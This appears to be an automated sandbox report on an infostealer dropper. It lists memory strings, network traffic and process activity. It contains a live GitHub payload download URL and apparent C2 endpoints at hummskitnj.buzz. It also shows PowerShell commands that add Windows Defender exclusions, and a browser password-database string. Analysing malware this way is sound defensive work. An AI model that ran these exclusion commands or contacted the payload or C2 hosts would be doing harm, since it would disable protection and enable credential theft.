                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2239884596.0000000003942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2239884596.0000000003942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: OiMp3TH.exe, 00000000.00000002.4461284237.00000000032C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
                Source: OiMp3TH.exeString found in binary or memory: https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/tpuyikkdktyh.exe
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2336687721.000000000394F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz/
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2286935677.0000000000767000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz/J
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2286970301.000000000394F000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2336828454.0000000003950000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2303858804.000000000394F000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262784662.000000000394E000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262559814.000000000394E000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2290478382.000000000394F000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2336687721.000000000394F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz/MN
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238402687.000000000394F000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238058591.000000000394C000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262784662.000000000394E000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262559814.000000000394E000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238144082.000000000394C000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238704688.000000000394F000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2239884596.000000000394F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz/RX
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2183388479.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz/X?
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2183388479.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2266197298.0000000000755000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262593903.0000000000767000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360934017.0000000000767000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360203323.000000000072F000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2303938546.0000000000767000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2266565065.000000000075A000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262593903.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238159093.000000000074A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz/api
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361624208.000000000072F000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2287115470.0000000000731000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360203323.000000000072F000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262593903.0000000000731000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz/apiH
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2286935677.000000000075A000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2266197298.0000000000755000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2266565065.000000000075A000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262593903.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238159093.000000000074A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz/apiP;
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361624208.000000000072F000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2287115470.0000000000731000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360203323.000000000072F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz/apir
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361624208.000000000072F000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360203323.000000000072F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz/apir$
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262593903.0000000000767000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz/apis
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361933717.0000000000767000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360934017.0000000000767000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz/apiz
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2183388479.00000000006C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz/d
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360203323.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361624208.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz/l
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361933717.0000000000767000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262593903.0000000000767000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360934017.0000000000767000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2286935677.0000000000767000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2303938546.0000000000767000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz/pi
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361933717.0000000000767000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360934017.0000000000767000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz/uo
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2286935677.0000000000767000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz/z
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361624208.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360203323.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2183388479.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz:443/api
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360203323.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz:443/apil
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361624208.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360203323.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz:443/apin.txtPK
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2239884596.0000000003942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: OiMp3TH.exe, 00000000.00000002.4461284237.00000000032F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                Source: OiMp3TH.exe, 00000000.00000002.4461284237.00000000032F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/tpuyikkdktyh.exe
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2239490888.0000000003BE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2239490888.0000000003BE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2290373903.000000000393C000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2266446094.000000000393C000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000002.2363117071.000000000393E000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2303858804.000000000393C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2239884596.0000000003942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2239490888.0000000003BE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2239490888.0000000003BE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2239490888.0000000003BE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2239490888.0000000003BE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2239490888.0000000003BE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2239490888.0000000003BE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.216.236:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.216.236:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.216.236:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.216.236:443 -> 192.168.2.5:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.216.236:443 -> 192.168.2.5:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.216.236:443 -> 192.168.2.5:49725 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.216.236:443 -> 192.168.2.5:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.216.236:443 -> 192.168.2.5:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.216.236:443 -> 192.168.2.5:49744 version: TLS 1.2

                System Summary

                barindex
                PE file has nameless sections
                Source: ghhqoznpon_638708802577261661.exe.0.drStatic PE information: section name:
                Source: ghhqoznpon_638708802577261661.exe.0.drStatic PE information: section name:
                Source: ghhqoznpon_638708802577261661.exe.0.drStatic PE information: section name:
                Source: ghhqoznpon_638708802577261661.exe.0.drStatic PE information: section name:
                Source: ghhqoznpon_638708802577261661.exe.0.drStatic PE information: section name:
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess Stats: CPU usage > 49%
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_007346D77_3_007346D7
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_007346D77_3_007346D7
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_007346D77_3_007346D7
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_007346D77_3_007346D7
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_007346D77_3_007346D7
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_007346D77_3_007346D7
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_039575027_3_03957502
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_039575027_3_03957502
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_007346D77_3_007346D7
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_007346D77_3_007346D7
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_007346D77_3_007346D7
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_039575027_3_03957502
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_039575027_3_03957502
                Source: OiMp3TH.exe, 00000000.00000000.2012588749.0000000000F32000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamepthkkad.exe0 vs OiMp3TH.exe
                Source: OiMp3TH.exe, 00000000.00000002.4460315252.000000000134E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs OiMp3TH.exe
                Source: OiMp3TH.exeBinary or memory string: OriginalFilenamepthkkad.exe0 vs OiMp3TH.exe
                Source: ghhqoznpon_638708802577261661.exe.0.drStatic PE information: Section: ZLIB complexity 0.9983207449261993
                Source: ghhqoznpon_638708802577261661.exe.0.drStatic PE information: Section: .data ZLIB complexity 0.9969605025245634
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/10@3/3
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:768:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3144:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ll53ne1s.sxi.ps1Jump to behavior
                Source: OiMp3TH.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: OiMp3TH.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\OiMp3TH.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186701169.00000000038E6000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186831807.00000000038C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: OiMp3TH.exeVirustotal: Detection: 25%
                Source: OiMp3TH.exeReversingLabs: Detection: 18%
                Source: unknownProcess created: C:\Users\user\Desktop\OiMp3TH.exe "C:\Users\user\Desktop\OiMp3TH.exe"
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\nhrhvnf'
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users'
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess created: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe "C:\nhrhvnf\ghhqoznpon_638708802577261661.exe"
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\nhrhvnf'Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users'Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess created: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe "C:\nhrhvnf\ghhqoznpon_638708802577261661.exe" Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
